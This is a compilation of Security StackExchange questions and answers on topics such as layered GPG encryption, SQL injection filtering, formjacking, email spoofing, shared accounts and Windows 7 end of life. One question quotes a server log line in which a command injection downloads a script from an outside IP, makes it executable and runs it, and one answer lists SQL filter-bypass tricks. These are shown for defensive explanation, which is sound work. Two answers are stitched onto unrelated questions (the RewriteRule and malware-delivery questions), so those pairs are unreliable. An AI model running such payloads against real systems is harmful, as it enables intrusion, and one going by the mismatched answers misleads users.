203,750 | Consider symmetric GPG encryption of a given file my_file.txt . Something like (in command line) gpg --symmetric --cipher-algo AES256 my_file.txt After suppying the prompt with the new password, the above produces my_file.txt.gpg . I could then encrypt again: gpg --symmetric --cipher-algo AES256 my_file.txt.gpg (where you would want to set a different password) And so on. Is there a limit on how many iterations of the above I can do? It seems to me there isn't, as symmetric encryption just takes a piece of text and transforms it into another, without ever asking what the piece of text is in the first place. Is this true? | Theoretically, there's no limit on the number of times you can encrypt a file. The output of an encryption process is again a file, which you can again pass it on to a different algorithm and get an output. The thing is, at decryption side, it will have to be decrypted in LIFO (last in, first out) style, with the proper passwords. For example, if your file was first encrypted with algo1 with password abcde , and then it was encrypted with algo2 with password vwxyz , then it will have to be decrypted first with algo2 (with password vwxyz ), and then with algo1 (with password abcde ). This method makes sense if you're sending the keys through different media or channels. This method would be of little use if all the passwords are sent through the same channel. | {
"source": [
"https://security.stackexchange.com/questions/203750",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/185302/"
]
} |
203,830 | The comments in this question debate about the added security of multi-layered encryption. There seems to be some disagreement, and I thought a proper question would be helpful here. So, to provide some common background, consider the following two scenarios: I apply symmetric encryption to a given file, as follows: gpg --symmetric --cipher-algo AES256 my_file.txt to which I add the password "mydogisamazing" I apply four layers of encryption to a given file, as follows: gpg --symmetric --cipher-algo AES256 my_file.txt
gpg --symmetric --cipher-algo AES256 my_file.txt.gpg
gpg --symmetric --cipher-algo AES256 my_file.txt.gpg.gpg
gpg --symmetric --cipher-algo AES256 my_file.txt.gpg.gpg.gpg where the passwords supplied to each are, respectively: "amazing" "is" "dog" "my" (so, when I decrypt all the layers, I have entered "my" "dog" "is" "amazing") Is option 2 more secure than option 1? Knowing almost nothing about encryption security, it seems to me it is, because anyone wanting to break in would have to run some password algorithm four times, whereas in option 1 the algorithm needs to be run 1 time only. What if different cipher algorithms were used instead of the same one? All in all, it seems also obvious to me that the answer does depend on the nature of the passwords. For instance, if I have 15 layers of encryption and each layer's password is merely one letter, it seems "trivial" to break the code. UPDATE : in response to a comment, I stress that the example above was trying to present an apparent "equivalent" case, i.e. "shorter passwords + more layers" versus "longer passwords + fewer layers". It seems only obvious to me (maybe wrong) that merely adding more layers of identical complexity will only increase the security of the encryption (in the mere sense of taking longer to hack the passwords). Hence my stress on the varying length of passwords. | Option 1 is more secure. In option 2, we can guess each word separately. When we guess "amazing", we get confirmation that this word is correct and we can continue to the second word. In option 1, we have to guess all four words at the same time. You may think that one GPG offers some security, and four GPGs offer four times that security, but it doesn't work like that. GPG offers near total security, and applying it more times does not improve security. There are uses for applying encryption multiple times, for example when both signing and encrypting, or when encrypting for multiple parties. However, encrypting things several times does not in general make them several times more secure. | {
"source": [
"https://security.stackexchange.com/questions/203830",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/185302/"
]
} |
203,843 | I'm wondering if it is possible to detect 100% of the possible SQLi attacks using a simple regex. In other words, using very simple PHP code as an example: if (preg_match("/select/i", $input)) {
attack_log("Possible SELECT SQLi detected.");
} The questions are: Will that regex catch all possible SQLi attacks that use SELECT? If not, is it possible to change that regex so that it is going to detect all injections that rely on SELECT? Is it possible to change that regex to so that it will catch all possible SQLi, so not only SELECT statements but also all the rest? I'm afraid that to achieve this I would need to add every possible SQL keyword to the regex, including "AND" and "OR". Supposing it's not possible or feasible to detect all SQLi by trying to match all the possible SQL keywords, is there a limited subset of keywords that would allow me to detect the vast majority of possible attacks? | Keyword filtering for SQLi is not a good technique. There are too many ways to bypass it. Crazy things like sel/**/ect might work, for instance. Or playing games with substr() . And then there's EXEC('SEL' + 'ECT 1') . There are many guides on how to bypass common filtering techniques. But then you might ask if there is a superset of things to filter for (like select and /**/ and substr and EXEC ), but then the list gets very, very long, and you still might not get a comprehensive list. The better approach is to understand the range of acceptable inputs and protect those or to make it ineffective to use SQLi through proper design. | {
"source": [
"https://security.stackexchange.com/questions/203843",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/175681/"
]
} |
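Following the closing advice of the answer above, the workable alternative to keyword blacklists is positive validation: define exactly what each input may look like and reject everything else, while parameterized queries keep data out of the SQL text entirely. A short Python illustration (the field rules are invented for the example):

import re

def is_valid_sort_column(value: str) -> bool:
    # Accept only known-good values instead of trying to enumerate
    # every dangerous keyword and obfuscation.
    return value in {"name", "created_at", "price"}

def is_valid_quantity(value: str) -> bool:
    return re.fullmatch(r"[0-9]{1,6}", value) is not None

# A keyword blacklist misses tricks such as "sel/**/ect";
# an allow-list rejects them simply because they are not on the list.
print(is_valid_sort_column("sel/**/ect"))   # False
print(is_valid_quantity("1 OR 1=1"))        # False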
203,859 | I am buying a "new" router from an open-box sale at a company that liquidates eCommerce returns. Plan to use it for a home network at cottage. I'm a bit nervous that it could have been modified by whoever had it last. What are the main risks in this scenario? What specific steps should one take before and during setup of a new router that someone else may have had access to in the past? Update: The device model is a TP-Link AC4500 (archer) router. | Short answer: do a factory reset, update the firmware, and you are good to go. The risk is very low, bordering zero. The previous owner may have installed a custom firmware or changed its configuration, but a firmware upgrade and factory reset is enough to take care of almost every change. The risk that the previous owner tampered with the router and his changes can survive even a firmware upgrade and factory reset is negligible. So, don't worry, unless you are a person of special interest : working on top-secret stuff or have privileged financial information on a big enterprise. But as you are buying a used router, I bet you are a common guy and would not be a target for those attacks. | {
"source": [
"https://security.stackexchange.com/questions/203859",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/91274/"
]
} |
203,987 | I just heard a very confused news broadcast about Symantec warning the world about the dangers of formjacking. The newsreader said it involved “hacking the form, not the website” whatever that means. I googled around and found a Symantec blog post about it, where they describe the attack as follows: The attacker “injects” malicious JavaScript into the targeted webpage The user fills out the form on that webpage The JavaScript sends the entered data to the server of the attacker. However, I would say that if an attacker has write access to the code on the server formjacking is the least of your concerns (and not the actual vulnerability – whatever gave them access is). Why is formjacking the big deal (it was on the national news where I live) and not the fact that tons of websites (among which British Airways according to Symantec) have a ridiculously large vulnerability that allows attackers access to their servers? | The Symantec article you are referring to is like this one . Looking at the graphic : Point 1 is what is generally the most interesting to security researchers, because that is where the vulnerability is. Points 2 and 3 just show what might be possible with such a vulnerability. For example, JavaScript can be used in phishing attacks (show a fake form) or to read out any data the user enters into forms. This is what Symantec calls formjacking, but it's of course nothing new. Their article also has a section "How are websites being compromised?", which will likely interest you. Vulnerabilities do indeed include the option to change server-side code, though not necessarily of the main application, but especially in JavaScript dependencies. Issues with including 3rd party JavaScript are of course nothing new either. Burp eg calls it Cross-domain script include , and OWASP warns about it as well. Including 3rd party scripts always requires complete trust in the 3rd party as well as trust in their security processes. Why is formjacking the big deal Good marketing on the part of Symantec? | {
"source": [
"https://security.stackexchange.com/questions/203987",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/21254/"
]
} |
203,997 | For example, it is possible that someone could spread malware with insecure wifi access point, but I don't realize how sending a bunch of network packets can result into a compromised computer if the transferred malicious code can't be explicitly(i.e. allowed by user) executed. Can you refer to the description on how this normally happens in reality? I consider only cases when computer user doesn't realize there is something wrong going inside it, and those which are related to code execution. | The Symantec article you are referring to is like this one . Looking at the graphic : Point 1 is what is generally the most interesting to security researchers, because that is where the vulnerability is. Points 2 and 3 just show what might be possible with such a vulnerability. For example, JavaScript can be used in phishing attacks (show a fake form) or to read out any data the user enters into forms. This is what Symantec calls formjacking, but it's of course nothing new. Their article also has a section "How are websites being compromised?", which will likely interest you. Vulnerabilities do indeed include the option to change server-side code, though not necessarily of the main application, but especially in JavaScript dependencies. Issues with including 3rd party JavaScript are of course nothing new either. Burp eg calls it Cross-domain script include , and OWASP warns about it as well. Including 3rd party scripts always requires complete trust in the 3rd party as well as trust in their security processes. Why is formjacking the big deal Good marketing on the part of Symantec? | {
"source": [
"https://security.stackexchange.com/questions/203997",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/199001/"
]
} |
204,249 | I know its best practice not to allow shared user accounts, but where is this best practice defined? Is it an ISO standard or something? What is the reasons to always create per person accounts? | Alice and Eve work for Bob. Alice is a very good worker who does exactly what Bob asks her to do. Eve is a criminal mastermind hell-bent on destroying Bob's company. Alice and Eve both share the same account. Eve logs into the account and uses it to sabotage an important business process. The audit log captures this action. How does Bob know who sabotaged his company? He has to get rid of the bad actor, but can't fire both of them, because his company depends on the work that they do. He could fire just one, but he has no way of knowing which one is his friend and which one is his enemy. If Alice and Eve had separate accounts, Bob could be sure that Eve was the one who did the sabotage. Eve might even avoid doing the sabotage, if she knows her account will be audited and she will be caught. EDIT: Adding from comments: If Eve quits, you now need to reset the password on every account she had access to, rather than just disabling her personal accounts. This is much harder to manage, and you will miss accounts. Additionally, it removes your ability to have granular control over access. If Alice should be writing checks, and Eve should be signing them, you essentially have no technological way to enforce that if they share the same account. Also, it makes it harder for a given individual to notice malicious changes to their environment. Alice knows what files are on Alice's desktop. Any new files will likely raise a red flag for her. Alice doesn't know what files are on Alice and Eve's shared desktop. It is likely new files will be met with a shrug and an assumption that another user put it there, not a malicious actor. | {
"source": [
"https://security.stackexchange.com/questions/204249",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/200520/"
]
} |
204,265 | Let's say we have a password.txt in a webdirectory that must not be leaked. Is it secure to use a RewriteRule like this? RewriteRule "^password.txt?*" "404.html" I tried to do something fishy like domain.com/somefile/../password.txt , or using "password%2Etxt", and it still redirected to 404. Is there anything else I have to worry about? If it's hackable, what's the hack? My understanding of the URL specification is that this is not possible. But, I'm handwaving a bit. Will the input to a rewriterule always be something guaranteed by the URL specification, or will they relax the requirements a bit the way css can be relaxed. If not, is the URL specification itself safe against this redirection? I can use .htaccess to simply ban the file, but then RewriteRule "sldmfklwmefwk.txt" "password.txt" doesn't work either. I want "sldmfklwmefwk.txt" to be allowed, but "password.txt" is banned, and any other attempts to access "password.txt" being blocked without accessing it via "sldmfklwmefwk.txt". | Alice and Eve work for Bob. Alice is a very good worker who does exactly what Bob asks her to do. Eve is a criminal mastermind hell-bent on destroying Bob's company. Alice and Eve both share the same account. Eve logs into the account and uses it to sabotage an important business process. The audit log captures this action. How does Bob know who sabotaged his company? He has to get rid of the bad actor, but can't fire both of them, because his company depends on the work that they do. He could fire just one, but he has no way of knowing which one is his friend and which one is his enemy. If Alice and Eve had separate accounts, Bob could be sure that Eve was the one who did the sabotage. Eve might even avoid doing the sabotage, if she knows her account will be audited and she will be caught. EDIT: Adding from comments: If Eve quits, you now need to reset the password on every account she had access to, rather than just disabling her personal accounts. This is much harder to manage, and you will miss accounts. Additionally, it removes your ability to have granular control over access. If Alice should be writing checks, and Eve should be signing them, you essentially have no technological way to enforce that if they share the same account. Also, it makes it harder for a given individual to notice malicious changes to their environment. Alice knows what files are on Alice's desktop. Any new files will likely raise a red flag for her. Alice doesn't know what files are on Alice and Eve's shared desktop. It is likely new files will be met with a shrug and an assumption that another user put it there, not a malicious actor. | {
"source": [
"https://security.stackexchange.com/questions/204265",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/189233/"
]
} |
204,392 | If I delete my router's history, is it still visible and can my ISP still provide it to my parents?
Or is it deleted from existence? | If I delete my router's history, is it still visible and can my ISP still provide it to my parents? Or is it deleted from existence? Your ISP's record of your network usage isn't in any way affected by you doing anything to your router. You could wipe its memory, subject it to an EMP, and crush its chips to dust, and it wouldn't have any effect on them. :-) They maintain their own logs, which you cannot delete. Whether your ISP will provide that information to your parents is another question, I expect it varies by locale/jurisdiction and possibly ISP. You can make it (nearly) impossible for your ISP to know what sites you're visiting by using Tor or similar. The project includes Tor Browser, based on Firefox ESR, which makes it really easy to browse over Tor. You can also use the Brave browser (no affiliation), based on the Chromium project, in its "Private window with Tor" mode. This is not user-configuring a browser for Tor (which the Tor project advises against, it's too easy to miss out important things), it's a browser from privacy-obsessed people with a Tor-enabled private browsing mode. Both Tor Browser and Brave have trade-offs, see this tweet thread (in particular the replies from Tom Lowenthal, their Security & Privacy PM). Some people say "You should never browse with Tor with anything but Tor Browser" but it's more nuanced than that. | {
"source": [
"https://security.stackexchange.com/questions/204392",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/200679/"
]
} |
204,450 | What is more secure, having one password of length 9 (salted and hashed) or having two different passwords, each of length 8 (salted and hashed using two different salts)? | As John Deters has noted, 2x8 is almost certainly worse - but the reasons why take a little explaining. There were a couple of problems with LANMAN hashes (the classic case of breaking a password in half, gone awry): Since passwords tend to be human-generated and somewhat short, if a single password was only a little longer than the first half (say, 8 characters), then cracking the second half would take dramatically less time - and could even give away what the first half was likely to be LANMAN was just so darned fast (for the attacker to attempt, in hash operations per second) LANMAN cut the passwords in two at an unfortunate length (7), that was quite susceptible to full exhaustion (and even moreso on modern GPUs) However, your question is a little different from the LANMAN case: It does not state that the 2x8 passwords are actually a single password broken in half (they could be independently generated, and random) It explicitly states that the two passwords are of length 8 (rather than, say, one of length 8 and the other of length 1, the famous LANMAN worst case) Unless your salts are trivially small, building rainbow tables would be infeasible - which is the purpose of salting (unlike LANMAN hashes, which were entirely unsalted) So it's an interesting question - one that's largely answered by looking at the associated math. Let's make some assumptions: Both the 9x1 and 8x2 approaches are salted and hashed using the same
salt lengths and algorithms Worst case for the attacker - the passwords are randomly generated from the printable ASCII character set (95 chars), with reasonably long salts. (The question would be less interesting if the passwords were human-generated, because in practice they would usually fall to easy attacks long before the attacker would have to resort to brute force) Modern hardware and speeds are fair game The hash algorithm may or may not be parallelism-friendly Given all of the above, I'd roughly expect: The 1x9 hash would be 100% exhausted in 95^9 (6.302 × 10^17) hashing operations (which might be parallelized well or poorly). The 2x8 hashes would be jointly 100% exhausted in (95^8)x2 (1.326 × 10^16) hashing operations (and no matter the algorithm, could easily be naively parallelized simply by cracking each hash on a different system - but can often be parallelized very efficiently on a single system as well, depending on the algorithm). In other words: That 9th character adds 95 times the work to exhaust, and might be hard to parallelize Two 8-character passwords only doubles the amount of work needed, and can be trivially parallelized Another way to think about it is that adding one more character roughly creates the same work as having to crack 95 eight-character passwords ! (If this isn't intuitive, start with simple cases comparing smaller cases like 1x1 vs 1x2, until you understand it). So all other things being equal, 1x9 should almost always be better than 2x8 . And really, this is not only a simple illustration of the power of parallelization, it should also make it obvious why allowing longer password lengths is so crucial. Each additional character in the model above adds 95 times work to the overall keyspace. So adding two characters adds 95^2 - or 9025 times - the work. Brute force quickly becomes infeasible, even for very fast and unsalted hashes. This would make an excellent homework question. ;) | {
"source": [
"https://security.stackexchange.com/questions/204450",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/200737/"
]
} |
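The keyspace comparison in the answer above is easy to reproduce; a few lines of Python confirm the numbers:

charset = 95                      # printable ASCII, as assumed above

one_nine = charset ** 9           # exhaust one 9-character password
two_eight = 2 * charset ** 8      # exhaust two independent 8-character passwords

print(f"1x9: {one_nine:.3e}")     # ~6.302e+17
print(f"2x8: {two_eight:.3e}")    # ~1.33e+16
print(one_nine / two_eight)       # 47.5, i.e. 95/2 times more work for the single longer password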
204,459 | I have very little experience with security (still learning) however was combing through my logs and I noticed the following request: "GET /index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=wget%20http://86.105.49.215/a.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a; HTTP/1.1" 200 16684 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36" Now first of all this made no sense to me with the exception of chmod 777 which tells me someone was trying to change my file permissions. My question is what kind of attack is this and what steps can I take to prevent it? | It's a command injection attack in which : the goal is execution of arbitrary commands on the host
operating system via a vulnerable application. Command injection
attacks are possible when an application passes unsafe user supplied
data (forms, cookies, HTTP headers etc.) to a system shell. In this
attack, the attacker-supplied operating system commands are usually
executed with the privileges of the vulnerable application. Command
injection attacks are possible largely due to insufficient input
validation. There are many strategies to mitigate or avoid this kind of attack, such as: Do not “exec” out to the Operating System if it can be avoided. Validate untrusted inputs (character set, minimum and maximum length, match to a regular expression pattern...). Neutralize meta-characters that have meaning in the target OS command line. Implement “Least Privilege”. You can find some here and have a look at this cheatsheet from OWASP for further details. | {
"source": [
"https://security.stackexchange.com/questions/204459",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/200751/"
]
} |
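A short Python illustration of the mitigations listed above (avoid the shell, validate untrusted input, pass arguments as data); the allowed-filename rule and report path are assumptions for the example.

import re
import subprocess

def fetch_report(filename: str) -> bytes:
    # Validate against a strict allow-list rather than trying to strip
    # shell metacharacters such as ";", "|" or "$()".
    if not re.fullmatch(r"[A-Za-z0-9_.-]{1,64}", filename):
        raise ValueError("invalid filename")
    # Argument list without a shell: the filename is passed as data, so an
    # input like "x; wget http://evil/a.sh -O /tmp/a" is never interpreted.
    result = subprocess.run(["cat", f"/srv/reports/{filename}"],
                            check=True, capture_output=True)
    return result.stdout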
204,530 | I'm reading through the extensive description of which data is acquired by Microsoft's telemetry 1 including the following paragraph: User generated files -- files that are indicated as a potential cause for a crash or hang. For example, .doc, .ppt, .csv files I was wondering whether Microsoft actually gathers data from a Word document in case Word crashes (I hope I'm wrong on this one). Is Microsoft getting the 'whole' file, only a paragraph, or am I misreading that part of the documentation? | Here is what they spy on, finally officially admitted after being proved again and again by different independent sources. That should give a pretty good idea of what actually is transmitted. To actually see what's being reported you can give yourself permissions for the %ProgramData%\Microsoft\Diagnosis directory and look at what's in there, but the files are encrypted, which is a very suspicious thing. What you can look at in the newer versions is the Diagnostic Data Viewer. But that does NOT guarantee or prove that there is document privacy in any way. At this point my guess is that they will transmit parts of files that generated crashes, or more if they consider it proper to do so, and they definitely can transmit any type of document via the encrypted content in \Diagnosis, with HTTPS as the transmission channel. Their EULA states: Finally, we will access, disclose and preserve personal data,
including your content (such as the content of your emails, other
private communications or files in private folders), when we have a
good faith belief that doing so is necessary to: 1. comply with
applicable law or respond to valid legal process, including from law
enforcement or other government agencies;
2. protect our customers, for example to prevent spam or attempts to defraud users of the services, or to help prevent the loss of life or
serious injury of anyone; 3. operate and maintain the security of our
services, including to prevent or stop an attack on our computer
systems or networks; or
4. protect the rights or property of Microsoft, including enforcing the terms governing the use of the services - however, if we receive
information indicating that someone is using our services to traffic
in stolen intellectual or physical property of Microsoft, we will not
inspect a customer's private content ourselves, but we may refer the
matter to law enforcement. Conclusion: they can and will do it at will. | {
"source": [
"https://security.stackexchange.com/questions/204530",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/200829/"
]
} |
204,669 | Even though sometimes software bugs and vulnerabilities are deemed as the same concept, there must be at least one distinct aspect between them, and I think the most prominent one is exploitability (the latter one having the property). What I'm curious about is, even after seeing many cases that divide-by-zero bugs are reported as software problems, I can hardly come up with any attack (other than DoS) using divide-by-zero bugs. I know not all kinds of bugs have the same impact upon a system in terms of security, but is there any attack method that uses divide-by-zero bugs to achieve something different than DoS, like privilege escalation for example? | At issue is that an exception handler will be invoked to handle the division by zero. In general, attackers know that exception handlers are not as well-tested as regular code flows. Your main logic flow might be sound and thoroughly tested, but an exception handler can be triggered by interrupts occurring anywhere in the code within its scope. int myFunction(int a, int b, SomeState state) {
state(UNINITIALIZED);
try {
state.something(a/b);
state(NORMAL);
}
catch () {
state.something(b/a);
state(INVERTED);
}
return retval;
} This horrible pseudocode sort of illustrates one way the flaw could be exploited. Let's say that an uninitialized state is somehow vulnerable. If this routine is called, the state is first uninitialized. If b is zero, it catches the exception and tries to do some other logic. But if both a and b are zero, it throws again, leaving state uninitialized. The division by zero itself wasn't the vulnerability, it's the bad code around it that's possible to exploit. | {
"source": [
"https://security.stackexchange.com/questions/204669",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/199967/"
]
} |
204,701 | I recently was emailed from HaveIBeenPwned.com (which I am signed up on) about the ShareThis website/tool (not signed up on). I have no memory of signing up for that service. When I go to recover the account (I might as well close/change password), I get this: The two facts seem mutually exclusive: Either I had an account and it was pwned, or I didn't have an account (and thus HIBP is in error)? How do I find out the true situation, and what is the most secure course of action? | From the FAQ : Why do I see my email address as breached on a service I never signed up to? When you search for an email address, you may see that address appear against breaches of sites you don't recall ever signing up to. There are many possible reasons for this including your data having been acquired by another service, the service rebranding itself as something else or someone else signing you up. For a more comprehensive overview, see Why am I in a data breach for a site I never signed up to? It's likely some services allow signing up without confirming an email address, or that accounts that haven't confirmed email addresses are still stored indefinitely but cannot be logged in to, or any number of similar issues. | {
"source": [
"https://security.stackexchange.com/questions/204701",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/11640/"
]
} |
204,770 | I read that you can write anything into the From: field of an e-mail. If that is true, then why are phishing e-mails trying to trick me with look-a-like addresses like [email protected] instead of just using the actual [email protected] itself? | While one could create a mail with @amazon.com as the SMTP envelope and/or From field of the mail header, the mail would likely be blocked since this domain is protected with Sender Policy Framework ( SPF ), DomainKeys Identified Mail ( DKIM ), and Domain-based Message Authentication, Reporting and Conformance ( DMARC ). This means that a spoofed mail would be detected as such and get rejected by many email servers. Contrary to this, using another domain which is not protected this way, or which is protected but controlled by the attacker, is more successful. To explain in short what these technologies do: SPF Checks if the sender IP address is allowed for the given SMTP envelope (SMTP.MAILFROM). dig txt amazon.com shows that an SPF policy exists. DKIM The mail server signs the mail. The public key to verify the mail is retrieved using DNS. Amazon uses DKIM as can be seen from the DKIM-Signature fields in the mail header. DMARC Aligns the From field in the mail header (RFC822.From) with the domain of the DKIM signature for DKIM or the domain of the SMTP envelope for SPF. If an aligned and successful SPF/DKIM exists the DMARC policy matches. dig txt _dmarc.amazon.com shows that Amazon has a DMARC record with a policy of quarantine . Neither SPF nor DKIM on its own helps against spoofing of the From field in the mail header. Only the combination of at least one of these with DMARC protects against such header spoofing. | {
"source": [
"https://security.stackexchange.com/questions/204770",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/76285/"
]
} |
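The dig lookups in the answer above can also be scripted. A sketch using the third-party dnspython package to check whether a domain publishes SPF and DMARC records (dns.resolver.resolve is the current API; older dnspython versions used dns.resolver.query):

import dns.resolver   # third-party package: dnspython

def txt_records(name: str):
    try:
        return [r.to_text().strip('"') for r in dns.resolver.resolve(name, "TXT")]
    except (dns.resolver.NXDOMAIN, dns.resolver.NoAnswer):
        return []

domain = "amazon.com"
spf = [r for r in txt_records(domain) if r.startswith("v=spf1")]
dmarc = [r for r in txt_records(f"_dmarc.{domain}") if r.startswith("v=DMARC1")]
print("SPF:  ", spf or "none published")
print("DMARC:", dmarc or "none published")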
204,777 | My university sent me an email informing me that, during a "periodic check", my password was found to be "easily discoverable and at risk of compromise". As I understand it, there shouldn't be a way for them to periodically check my password unless my password was stored in plaintext. My question: Is my understanding wrong, or has my university been storing my password in plaintext? UPDATE: The school IT department linked me to a page explaining the various ways they check passwords. Part of the page allowed me to run the tests on my university account and display the password if it was indeed discovered from their tests. The password it displayed was an older (weaker) password of mine that was simply English words separated by spaces, which explains how they were able to find it. | Your understanding is wrong. If passwords are stored as a strong salted hash, the administrator can’t find good user passwords, but can find ones that are on lists of commonly used passwords by applying the hash and salt to every password on the list and looking for a match. It’s a lot easier if the stored passwords aren’t salted, though, since in that case you only have to run it once and not once per user, so this may indicate that the stored passwords are not salted, which is contrary to best practice. | {
"source": [
"https://security.stackexchange.com/questions/204777",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/201168/"
]
} |
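To illustrate the audit described in the answer above, here is a minimal sketch of checking salted hashes against a common-password list. The usernames, salts, and the simple SHA-256 construction are assumptions made up for the example, not how any particular university stores passwords; real systems should use a dedicated password-hashing function such as bcrypt, scrypt, or Argon2, and the same dictionary-check idea still applies.

```python
# Sketch: how an administrator can flag weak passwords while storing only
# salted hashes. The salts, accounts, and SHA-256 construction below are
# illustrative; real systems should use bcrypt, scrypt, or Argon2.
import hashlib


def salted_hash(salt, password):
    return hashlib.sha256(salt.encode() + password.encode()).hexdigest()


common_passwords = ["password", "123456", "letmein", "qwerty"]

# Hypothetical stored records: username -> (salt, salted hash)
stored = {
    "alice": ("a9f3", salted_hash("a9f3", "letmein")),
    "bob": ("77c1", salted_hash("77c1", "Xq#9v!t2z$")),
}

for user, (salt, digest) in stored.items():
    for candidate in common_passwords:
        if salted_hash(salt, candidate) == digest:
            print(f"{user}: password found on the common-password list")
            break
    else:
        print(f"{user}: not found on the list")
```

Note that the check never reverses the hash; it simply guesses candidates the same way an attacker with a copy of the database would, which is why a password it can find is fairly described as "easily discoverable".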
204,833 | I have a domain, https://www.example.com, and it has an SSL certificate for that hostname only. I also want to redirect people who only type example.com into their browser's address bar. Should I secure the second hostname, https://example.com, as well (and why), or is HTTP-only enough? I don't use a wildcard SSL certificate. | If you don't secure example.com and a user visits that site, a man-in-the-middle attacker can manipulate the traffic and keep the user on example.com, where he can intercept all traffic. It doesn't matter that your version of example.com redirects to https://www.example.com/; the attacker can change this behavior and serve an HTTP version of your site to the user. (A small check script follows below.) | {
"source": [
"https://security.stackexchange.com/questions/204833",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/201224/"
]
} |
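As a practical follow-up to the answer above, here is a minimal sketch for checking how the bare domain currently behaves. It assumes the third-party requests package, the domain value is a placeholder to replace with your own, and a passing check only shows correct behaviour from your own vantage point; it does not by itself prevent the man-in-the-middle scenario the answer describes.

```python
# Sketch: check how the bare domain behaves today. Requires the third-party
# "requests" package; replace `domain` with a domain you actually control.
import requests

domain = "example.com"

# 1. Plain HTTP on the bare domain should answer with a redirect to an
#    https:// URL, not with page content an attacker could tamper with.
r = requests.get("http://" + domain + "/", allow_redirects=False, timeout=10)
print("HTTP status:", r.status_code, "Location:", r.headers.get("Location"))

# 2. HTTPS on the bare domain should present a certificate valid for that
#    exact name; requests raises an SSLError if the certificate does not match.
r = requests.get("https://" + domain + "/", allow_redirects=False, timeout=10)
print("HTTPS status:", r.status_code)
print("HSTS:", r.headers.get("Strict-Transport-Security", "not set"))
```

If the first request returns page content (a 200) instead of a 301/302 redirect to an https:// URL, the bare domain is exactly the kind of unprotected entry point the answer warns about.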
204,876 | Is there a comparison between Ghidra and IDA? Are there any specific features and functionality that Ghidra has but IDA doesn't? Is there a good source (preferably a book) that explains Ghidra in detail? | This is largely subjective, but: Ghidra is free and open-source on GitHub, including the decompiler. IDA is very expensive, particularly when you start adding the decompiler licenses. IDA supports some architectures that Ghidra doesn't, and vice versa. IDA has a debugger whereas Ghidra originally did not; as of 2021, the stable branch of Ghidra incorporates a debugger through gdb or WinDBG. Ghidra has the ability to load multiple binaries at once into a project, whereas IDA support for this is limited and mostly an ugly hack. This means that you can trace code between an application and its libraries more easily. Ghidra's disassembler has data flow analysis built in, showing you where data can come from when you click a register or variable. IDA has "dumb" text highlighting to show other uses of that register. These features are slightly different implementations of the same concept and both have their uses. Ghidra has collaborative disassembly/decompiler projects built in by design, whereas IDA requires plugins for collaboration and its database files are not designed to be shared. Ghidra has an undo button, and it works (IDA originally didn't, which was super annoying; as of version 7.3, IDA also has an undo feature). IDA is far more mature and has a lot of little features that have been added over the years that Ghidra cannot (yet) mirror. Since IDA is a more mature and ubiquitous product, there are a lot of open-source tools built around it. Ghidra appears to have better support for very large (1GB+) firmware images with decent performance. It also doesn't have problems with analysing firmware images that declare large memory regions; IDA historically has had problems with this and it can be quite frustrating. Anecdotally, Ghidra's support for disassembling Windows OS binaries (e.g. kernelbase.dll) is currently broken due to some bugs in the x86 instruction decoder; there are issues on GitHub discussing this. These points are true at the time of writing (March 2019) but may change over time. | {
"source": [
"https://security.stackexchange.com/questions/204876",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/95113/"
]
} |
205,009 | I'm working on integrating a payment system with PayPal in C#, and I installed the official PayPal NuGet package. Then I went to the PayPal GitHub site, which linked to the SDK Reference site below. At that point both Chrome and Firefox warned me about "Deceptive Site Ahead". Is this site really dangerous? The URLs are listed here so that people don't need to click on potentially dangerous links: https://github.com/paypal/PayPal-NET-SDK
http://paypal.github.io/PayPal-NET-SDK/Samples/PaymentWithPayPal.aspx.html | No, it's not dangerous at all. Your browser is warning you because a non-PayPal website has PayPal in its name. This is a common technique used by phishing sites that attempt to fool you into thinking the site is official. For example, a website might be called paypal.secure1234.com and made to look like the official site, enticing you to trust it and enter your sensitive credentials. The browser has no way of knowing that the site you are visiting has PayPal in its name for completely benign reasons. | {
"source": [
"https://security.stackexchange.com/questions/205009",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/79965/"
]
} |
205,193 | Microsoft has announced that Windows 7 will no longer receive updates after January 14, 2020: Here. I hate Windows 10's forced updates and telemetry, so I have always stuck with Windows 7, but it may be as good as dead once security updates stop. Linus Tech Tips did a great video covering this issue: Here. With this massive change, I was wondering if anyone knows what the real impact will be. Can third-party antivirus successfully substitute for Windows 7 security updates after they are discontinued? Right now I use Malwarebytes and AVG, and I feel as though that would be enough, but this is something you have to be sure about. I feel as though this has already been studied with Windows Vista, but I am not clever enough to google the right words, so I have turned to the amazing community here for solid answers. Is Windows 7 being left 4 dead, or is Y2K coming back for round 2? | Nope. After Microsoft discontinues security updates for a version of Windows, there is no safe way to keep running that version. Some people will promote virtual patching, where an external firewall scans all your traffic looking for patterns that look malicious. I would not trust that, and it requires a separate, non-vulnerable computer. Many of the vulnerabilities patched by Microsoft are not the sort that antivirus software is good at catching. In the most recent example, Google announced a Chrome bug combined with a Windows 7 bug that allowed a visited site to remotely execute arbitrary code, and this was being exploited in the wild. After end of life, Microsoft will not patch this type of bug. (https://www.zdnet.com/article/google-chrome-zero-day-was-used-together-with-a-windows-7-zero-day/) | {
"source": [
"https://security.stackexchange.com/questions/205193",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/201396/"
]
} |
